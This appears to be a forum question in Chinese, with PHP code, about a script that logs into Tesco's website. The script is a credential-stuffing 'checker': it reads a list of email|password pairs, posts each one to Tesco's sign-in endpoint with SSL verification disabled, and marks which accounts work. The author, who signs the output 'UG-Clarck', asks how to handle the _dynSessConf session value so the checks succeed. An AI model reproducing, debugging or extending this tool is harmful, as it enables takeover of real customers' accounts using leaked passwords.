我正在尝试使用“tesco.com”网站
下面是我的代码:
<?php
Class Checker{
public function curl($url,$post = false,$info = false)
{
$agent= 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)';
$curl = curl_init($url);
if($post !== false)
{
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl,CURLOPT_POST,1);
}
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl,CURLOPT_USERAGENT, $agent);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
curl_setopt($curl, CURLOPT_REFERER, "https://secure.tesco.com/direct/my/register.page");
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIESESSION, true);
if($info !== false)
{
curl_setopt($curl, CURLOPT_URL, $info);
curl_setopt($curl, CURLOPT_CUSTOMREQUEST, 'GET');
}
$data = curl_exec($curl);
return $data;
}
}
$security = explode("\r\n", $_POST['security']);
$checker = new Checker();
if($_POST['initiate']){
foreach($security as $userlogin)
{
$combo = explode("|",$userlogin);
$email = $combo[0];
$pass = $combo[1];
if($pass != ""){
$splittalk = split("@",$email);
$usertalk = $splittalk[0];
$domaintalk = $splittalk[1];
$emailencode = str_replace("@","%40",$email);
$csrfmiddlewaretoken = explode('_csrf',file_get_contents(realpath('.').'/cookie.txt'));
$csrfmiddlewaretoken = trim($csrfmiddlewaretoken[1]);
$post = "_dyncharset=utf-8&_dynSessConf=-7028765781423058569&signin-email=".$emailencode."&_D%3Asignin-email=+&signin-password=".$pass."&_D%3Asignin-password=+&signin-button=Sign+in&_D%3Asignin-button=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=%2Fdirect%2Fmy%2Fregister.page&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=%2Fdirect%2F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.registerType=full&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.registerType=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.userId=&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.userId=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.tokenGenerated=&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.tokenGenerated=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.finalSuccessURL=%2Fdirect%2F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.formValue.finalSuccessURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.basketErrorURL=%2Fdirect%2Fbasket-details%2Fbasket-details.page&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.basketErrorURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.jsCheckForCheckout=true&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.jsCheckForCheckout=+&_DARGS=%2Fblocks%2Flogin%2FintegratedRegistration%2Fir-login.jsp";
$securitycheck = $checker->curl("https://secure.tesco.com/direct/my/register.page?_DARGS=/blocks/login/integratedRegistration/ir-login.jsp",$post);
$now = "<p style=\"color:blue\">Checked by UG-Clarck at ".date("g:i a - F j, Y")."</p>";
if(preg_match('/Your email address and password/', $securitycheck))
{
echo "<font color=red><b>Not Working</b></font> ~ ".$email."|".$pass." - ".$now."<br/>";
}
else{
echo "<font color=lime><b>Working</b></font> ~ ".$email."|".$pass." - ".$now."<br/>";
}
}
}
}
?>
我的问题是,在 $post 中,_dynSessConf= 类似于标题上的会话 ID?我不知道它叫什么。所以我的问题是,每当我在主机上执行此操作时,即使日志是假的,我也会继续工作。我尝试执行https://secure.tesco.com/direct/my/register.page?_DARGS=/blocks/login/integratedRegistration/ir-login.jsp以及发布数据,但我收到一个错误重定向,告诉页面已被删除或类似的东西。但是,当我得到一个新的 _dynSessConf= ID 时,帖子数据正在执行,但仅针对我正在使用的当前浏览器,但是当我通过隐私浏览执行此操作时,它会将我重定向到错误页面,告知它已被删除。